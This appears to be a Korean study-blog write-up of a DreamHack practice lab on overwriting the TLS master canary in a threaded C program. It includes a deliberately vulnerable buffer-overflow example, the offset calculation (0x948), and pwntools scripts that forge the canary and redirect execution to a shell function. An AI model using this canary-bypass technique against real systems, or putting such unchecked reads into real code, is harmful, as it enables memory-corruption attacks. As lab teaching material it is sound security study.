[DreamHack System Hacking] Master Canary - (1)

실습 예제 코드는 다음과 같다.

// Name: mc_thread.c
// Compile: gcc -o mc_thread mc_thread.c -pthread -no-pie
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void giveshell() { execve("/bin/sh", 0, 0); }
void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}
void thread_routine() {
  char buf[256];
  int size = 0;
  printf("Size: ");
  scanf("%d", &size);
  printf("Data: ");
  read(0, buf, size);
}
int main() {
  pthread_t thread_t;
  init();
  if (pthread_create(&thread_t, NULL, (void *)thread_routine, NULL) < 0) {
    perror("thread create error:");
    exit(0);
  }
  pthread_join(thread_t, 0);
  return 0;
}

 

 

 

 

Thread Stack

스레드 함수에서 선언된 변수는 일반적인 함수에서 사용하는 스택 영역이 아닌 TLS와 인접한 영역에 할당되는 점이 다르다.

하지만 버퍼를 할당했을 때 TLS 영역에 존재하는 마스터 카나리를 참조한다는 점은 동일하다.

 

다음은 pthread_create 함수 코드이다.

#define THREAD_COPY_STACK_GUARD(descr) \
  ((descr)->header.stack_guard						      \
   = THREAD_GETMEM (THREAD_SELF, header.stack_guard))
int
__pthread_create_2_1 (pthread_t *newthread, const pthread_attr_t *attr,
		      void *(*start_routine) (void *), void *arg) 
{
    ...
    #ifdef THREAD_COPY_STACK_GUARD
    THREAD_COPY_STACK_GUARD (pd);
    #endif
    /* Copy the pointer guard value.  */
    #ifdef THREAD_COPY_POINTER_GUARD
    THREAD_COPY_POINTER_GUARD (pd);
    #endif
    /* Verify the sysinfo bits were copied in allocate_stack if needed.  */
    #ifdef NEED_DL_SYSINFO
    CHECK_THREAD_SYSINFO (pd);
    #endif
    ...
}

THREAD_COPY_STACK_GUARD 매크로를 통해 header.stack_guard에 위치하는 마스터 카나리 값을 가져온다.

 

스래드에서 할당한 변수는 마스터 카나리가 위치하는 주소보다 낮은 주소에 위치하기 때문에 스택 버퍼 오버플로우가 발생한다면 마스터 카나리를 덮어쓸 수 있다.

모든 함수에서는 함수가 실행될 때마다 FS 세그먼트 레지스터를 참조해 해당 주소로부터 0x28 바이트만큼 떨어진 마스터 카나리를 가져온다. 취약점을 통해 마스터 카나리를 임의의 값으로 조작할 수 있다면, 스택 카나리를 알아낼 필요 없이 익스플로잇 할 수 있다.

 

 

 

코드 분석

위에서 언급한 실습 예제를 분석해보자.

 

보호 기법 🛡️

 

코드 분석 🔎

main 함수

int main() {
  pthread_t thread_t;
  init();
  if (pthread_create(&thread_t, NULL, (void *)thread_routine, NULL) < 0) {
    perror("thread create error:");
    exit(0);
  }
  pthread_join(thread_t, 0);
  return 0;
}

thread_routine 함수

void thread_routine() {
  char buf[256];
  int size = 0;
  printf("Size: ");
  scanf("%d", &size);
  printf("Data: ");
  read(0, buf, size);
}

 

예제에서는 pthread_create 함수를 통해 스레드를 생성하여 thread_routine을 생성한다.

해당 함수에서 입력한 size 만큼 256바이트 버퍼에 값을 입력할 수 있기 때문에 스택 버퍼 오버 플로우가 발생한다.

 

 

 

 

익스플로잇 설계

주소 거리 계산

스택 버퍼 오버플로우 취약점으로 마스터 카나리를 덮어쓰기 위해서는 스레드에서 할당한 버퍼 주소와 마스터 카나리의 주소의 거리를 계산해야 한다. 이는 디버깅을 통해 알아낼 수 있다.

 

디스어셈블을 통해 브레이크 포인트를 설정할 수 있다.

디스어셈블 결과를 보면, thread_routine+106와 thread_routine+121을 확인했을 때 read 함수에서 [rbp-0x110] 위치에 입력받는 걸 알 수 있다.

설정한 브레이크포인트까지 실행하고, 확인한 rbp-0x110 주소가 스택 버퍼 주소이다.

 

스택 버퍼 주소를 알아냈으니 마스터 카나리의 주소를 알아내고 두 주소의 간격을 알아내야 한다.

다음의 연산결과를 확인해보면 0x948만큼 떨어져 있는 걸 확인할 수 있다.

 

 

 

마스터 카나리 변조

버퍼 주소와 마스터 카나리의 간격이 0x948 바이트이므로, 0x948바이트 패딩과 임의의 8바이트 값을 입력하면 마스터 카나리를 원하는 값으로 조작할 수 있다.

 

# Name: mc_thread.py
from pwn import *
p = process("./mc_thread")
payload = "A"*0x948
payload += p64(0x4141414141414141)
inp_sz = len(payload)
p.sendlineafter("Size: ", str(inp_sz))
p.sendlineafter("Data: ", payload)
p.interactive()

마스터 카나리를 0x4141414141414141 로 조작한 익스플로잇 코드이다.

코드를 살펴보면, 스택 버퍼와 RBP, 그리고 리턴 주소를 모두 "A"로 덮었다. 카나리와 덮어쓰인 카나리의 값이 같으므로 스택 카나리 검사를 우회할 수 있다. 

 

익스플로잇을 실행하면 다음과 같다.

Abort가 발생하지 않는 걸 확인할 수 있다.

 

 

 

RIP 조작

마스터 카나리를 조작했다면, 조작한 카나리를 덮어쓰고 리턴 주소를 주어진 giveshell 함수로 덮어쓰면 셸을 획득할 수 있습니다.

다음의 코드는 스택 버퍼를 가득 채우고, 조작한 카나리와 같은 값으로 덮어쓴 다음 리턴 주소를 giveshell로 조작한 익스플로잇 코드이다.

 

# Name: mc_thread.py
from pwn import *
p = process("./mc_thread")
elf = ELF('./mc_thread')
giveshell = elf.symbols['giveshell']
payload = "A"*264
payload += "A"*8 # canary
payload += "B"*8
payload += p64(giveshell)
payload += "A"*(0x948-len(payload))
payload += p64(0x4141414141414141) # master canary
inp_sz = len(payload)
p.sendlineafter("Size: ", str(inp_sz))
p.sendlineafter("Data: ", payload)
p.interactive()